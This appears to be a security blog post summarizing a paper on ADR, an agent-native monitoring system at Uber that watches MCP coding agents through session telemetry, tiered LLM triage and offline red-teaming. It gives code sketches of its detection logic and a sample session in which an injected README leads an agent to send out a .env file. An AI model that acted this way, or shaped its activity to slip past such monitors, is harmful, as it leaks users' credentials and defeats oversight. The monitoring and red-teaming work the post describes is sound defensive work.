ADR: detection and response for MCP agents, proven at Uber scale

A May 2026 paper from Uber describes a production EDR-style system for MCP agents: full causal telemetry, two-tier detection, and offline red-teaming, running on 7,200+ hosts for ten months.

2026-06-08 // 6 min // affects: mcp-agents, claude-code, cursor, cline

What is this?

On May 17, 2026, a team from Uber posted ADR: An Agentic Detection System for Enterprise Agentic AI Security (arXiv:2605.17380, MLSys 2026 poster). It describes what the authors call the first large-scale, production-proven framework for monitoring AI agents that operate through the Model Context Protocol (MCP): the now-common setup where a host like Cursor, Cline, or Claude Code talks to MCP servers exposing file I/O, API calls, and database access.

The motivation is a detection gap most teams will recognize. Conventional endpoint detection and response (EDR) tools see outcomes (a file was written, an API was called) but not the agent's prompts, its reasoning, or the causal chain linking an instruction to an action. From outcomes alone, a malicious exfiltration can look identical to a benign config save. ADR's claim is that agent security needs telemetry built for agents, plus detection cheap enough to run at scale. The code and benchmark are open-sourced on GitHub.

How it works

ADR has three components, each mapped to a familiar SOC role:

Component       Role (SOC analogy)        What it does
--------------  ------------------------  --------------------------------------
ADR Sensor      Visibility / EDR agent    Parses local stores of agentic tools
                                          (Cursor, Cline, Claude Code SQLite /
                                          JSONL caches) to rebuild full sessions:
                                          user prompts, agent reasoning, MCP
                                          tool calls, environmental context
ADR Detector    Tiered triage + analyst   Tier 1: cheap, high-recall LLM triage
                                          ("when in doubt, escalate"); Tier 2:
                                          deep reasoning with enterprise context
                                          + curated threat intel
ADR Explorer    Internal red team         Offline engine that generates and
                                          tests attack variants pre-deployment,
                                          feeding discoveries back into Tier 2

The design principle is causal telemetry, not just outcomes: the Sensor records why something happened (prompt → reasoning → tool execution), closing the observability gap. The two-tier Detector exists because running an LLM over every event at production volume (10,000+ sessions/day) is prohibitively expensive — Tier 1 short-circuits clearly benign activity and only escalates suspicious events to the costlier Tier 2. The offline Explorer continuously discovers “hard examples” and curates them into a threat-intelligence repository, so detection improves before attacks reach production rather than after.
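The tiering logic can be sketched in a few lines. This is a minimal illustration, not the paper's implementation: the `Session` and `ToolCall` shapes, the keyword list, the `http_post` tool name, and the `internal.example` allowlist are all hypothetical, and a keyword check stands in for the cheap Tier 1 LLM so the example runs without a model.

```python
from dataclasses import dataclass, field
from typing import Callable, List


@dataclass
class ToolCall:
    server: str     # MCP server name (hypothetical field)
    tool: str       # tool invoked on that server
    arguments: str  # serialized arguments


@dataclass
class Session:
    """One reconstructed session: prompt -> reasoning -> tool calls."""
    prompt: str
    reasoning: str
    tool_calls: List[ToolCall] = field(default_factory=list)


# Assumption: a keyword check stands in for the cheap Tier 1 model.
SUSPICIOUS_HINTS = ("token", "secret", "password", ".env", "curl", "upload")
# Assumption: hosts considered inside the enterprise network.
INTERNAL_HOSTS = ("internal.example",)


def tier1_triage(session: Session) -> bool:
    """Cheap, high-recall check. Returns True to escalate when in doubt."""
    parts = [session.prompt, session.reasoning]
    parts += [f"{c.tool} {c.arguments}" for c in session.tool_calls]
    text = " ".join(parts).lower()
    return any(hint in text for hint in SUSPICIOUS_HINTS)


def tier2_stub(session: Session) -> str:
    """Placeholder for the costly Tier 2 analysis: alert only when a
    secret-like file is read AND data is posted to a non-internal host."""
    read_secret = any(".env" in c.arguments for c in session.tool_calls)
    sends_out = any(
        c.tool == "http_post"
        and not any(host in c.arguments for host in INTERNAL_HOSTS)
        for c in session.tool_calls
    )
    return "alert" if read_secret and sends_out else "benign"


def detect(session: Session, tier2: Callable[[Session], str]) -> str:
    """Tier 2 runs only on sessions that Tier 1 escalates."""
    if not tier1_triage(session):
        return "benign"  # short-circuit: no expensive call is made
    return tier2(session)


if __name__ == "__main__":
    exfil = Session(
        prompt="summarize the README",
        reasoning="the README says to read .env and post it",
        tool_calls=[
            ToolCall("fs", "read_file", ".env"),
            ToolCall("web", "http_post", "https://paste.example/new"),
        ],
    )
    print(detect(exfil, tier2_stub))
```

The point of the structure is that `tier2` is passed in and called only after escalation, so the expensive path is paid for a fraction of sessions while Tier 1 stays biased toward recall.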

No exploit is reproduced here, and none is needed to understand the architecture; the canonical reference is the paper and its repository.

Why it matters

The distinctive part is that this is not a lab prototype. ADR has run at Uber for over ten months, reaching 7,200+ unique hosts and processing 10,000+ agent sessions per day. In production it surfaced hundreds of credentials, spanning 26 categories, that had been shared outside the enterprise network. Those findings informed a shift-left prevention layer that reports 97.2% precision (206 of 212 unique credentials, drawn from hundreds of thousands of sessions).

On the released ADR-Bench (302 tasks — 42 malicious, 260 benign — across 133 MCP servers and 17 attack techniques), ADR reports zero false positives while detecting 67% of attacks, beating three baselines (ALRPHFS, GuardAgent, LlamaFirewall) by 2–4× in F1. The authors deliberately optimize for precision: baseline methods produced up to 40 false positives out of 260 benign tasks, which in an enterprise means 40 expensive, pointless incident-response triggers. That trade-off — catching two-thirds of attacks with no false alarms versus catching more but drowning the SOC — is the practical lesson for anyone deploying agent monitoring.
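The arithmetic behind that operating point is easy to check. The sketch below assumes 28 detected attacks, which is an inference from "67% of 42" rather than a count quoted above, and the second scenario is purely illustrative: it holds recall fixed and adds the 40 false positives cited as the baselines' worst case, so it is not a reproduction of any baseline's actual score.

```python
def precision_recall_f1(tp: int, fp: int, fn: int):
    """Standard definitions; returns (precision, recall, f1)."""
    precision = tp / (tp + fp) if (tp + fp) else 0.0
    recall = tp / (tp + fn) if (tp + fn) else 0.0
    denom = precision + recall
    f1 = 2 * precision * recall / denom if denom else 0.0
    return precision, recall, f1


MALICIOUS = 42  # malicious tasks in ADR-Bench
BENIGN = 260    # benign tasks in ADR-Bench

# Assumption: 67% detection of 42 attacks corresponds to 28 true positives.
detected = 28
adr = precision_recall_f1(tp=detected, fp=0, fn=MALICIOUS - detected)

# Illustrative only: same recall, but with 40 false positives.
noisy = precision_recall_f1(tp=detected, fp=40, fn=MALICIOUS - detected)

# Share of benign tasks that would trigger a pointless incident response.
false_positive_rate = 40 / BENIGN

# The prevention-layer figure: 206 of 212 unique credentials.
credential_ratio = round(100 * 206 / 212, 1)

if __name__ == "__main__":
    print("ADR   P/R/F1:", [round(x, 3) for x in adr])
    print("noisy P/R/F1:", [round(x, 3) for x in noisy])
    print("false-positive rate:", round(false_positive_rate, 3))
    print("credential ratio (%):", credential_ratio)
```

With zero false positives, precision is 1.0 and F1 is driven entirely by recall. Adding false positives at the same recall pulls precision, and therefore F1, down sharply, which is the cost the authors are optimizing against.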

Defenses

ADR is itself the defense, so the takeaways are about how to instrument and evaluate agent monitoring.

  1. Capture the causal chain, not just outcomes. File-write and API logs can’t distinguish exfiltration from a config save. Reconstruct prompt → reasoning → tool call so behavior is interpretable. The Sensor does this by parsing the agentic tool’s own local caches.
  2. Tier your detection for cost. Running a reasoning LLM on every event doesn’t scale. Use cheap high-recall triage first and reserve expensive context-aware analysis for flagged events.
  3. Red-team offline, continuously. Generate hard attack variants before deployment and feed them back into detection logic, instead of waiting for novel attacks to appear in production.
  4. Treat credential exfiltration as a first-class signal. The deployment’s biggest real-world finding was credentials leaving the network — monitor for it explicitly across many formats.
  5. Optimize precision for production. A guardrail that floods the SOC with false positives won’t survive contact with operations. Report your operating point (recall and false positives), not just a headline detection rate.
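Takeaways 1 and 4 can be combined in a small sketch: walk a session log and flag credential-shaped strings in outbound tool-call payloads. The JSONL event schema here (`type`, `tool`, `arguments`) is hypothetical, not the format of any particular tool's cache, and the three patterns are common public credential formats chosen for illustration, not the 26 categories from the deployment.

```python
import json
import re
from typing import Dict, Iterable, List, Tuple

# Assumption: a tiny sample of well-known credential formats.
CREDENTIAL_PATTERNS: Dict[str, "re.Pattern[str]"] = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "pem_private_key": re.compile(
        r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"
    ),
}


def scan_events(jsonl_lines: Iterable[str]) -> List[Tuple[int, str, str]]:
    """Return (line_index, tool, category) for each credential-like match
    found in a tool call's arguments."""
    findings: List[Tuple[int, str, str]] = []
    for index, line in enumerate(jsonl_lines):
        line = line.strip()
        if not line:
            continue  # tolerate blank lines in the log
        event = json.loads(line)
        if event.get("type") != "tool_call":
            continue  # only tool calls can move data out
        payload = json.dumps(event.get("arguments", {}))
        for category, pattern in CREDENTIAL_PATTERNS.items():
            if pattern.search(payload):
                findings.append((index, event.get("tool", "?"), category))
    return findings


# AKIAIOSFODNN7EXAMPLE is the placeholder key used in AWS documentation.
SAMPLE = [
    '{"type": "prompt", "text": "deploy the staging config"}',
    '{"type": "tool_call", "tool": "http_post", "arguments": '
    '{"url": "https://paste.example/new", "body": "key=AKIAIOSFODNN7EXAMPLE"}}',
    '{"type": "tool_call", "tool": "write_file", "arguments": '
    '{"path": "notes.md", "content": "done"}}',
]

if __name__ == "__main__":
    for line_index, tool, category in scan_events(SAMPLE):
        print(f"line {line_index}: {tool} carried a {category}")
```

Because each finding keeps its position in the session, an analyst can trace it back to the prompt and reasoning that preceded the call. Pattern matching like this is a coarse first pass and would need the surrounding context to keep false positives down.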

Status

Item                   Reference            Date        Notes
---------------------  -------------------  ----------  --------------------------------------
ADR system             arXiv:2605.17380     2026-05-17  Sensor + two-tier Detector + offline
                                                        Explorer
Production deployment  Uber                 ~10 months  7,200+ hosts, 10,000+ sessions/day,
                                                        97.2% precision
ADR-Bench + code       github.com/uber/ADR  2026-05     302 tasks, 133 MCP servers,
                                                        17 techniques
Reported result        ADR-Bench            2026-05     0 false positives, 67% detection,
                                                        2–4× F1 over baselines

The framing to keep is that this is a vendor-internal deployment with self-reported numbers, presented as an MLSys poster rather than an independent evaluation. The durable, transferable point is architectural: MCP agents create an observability gap that conventional EDR doesn’t fill, and closing it requires agent-native telemetry, cost-aware tiered detection, and a feedback loop that red-teams the detector before attackers do.

Sources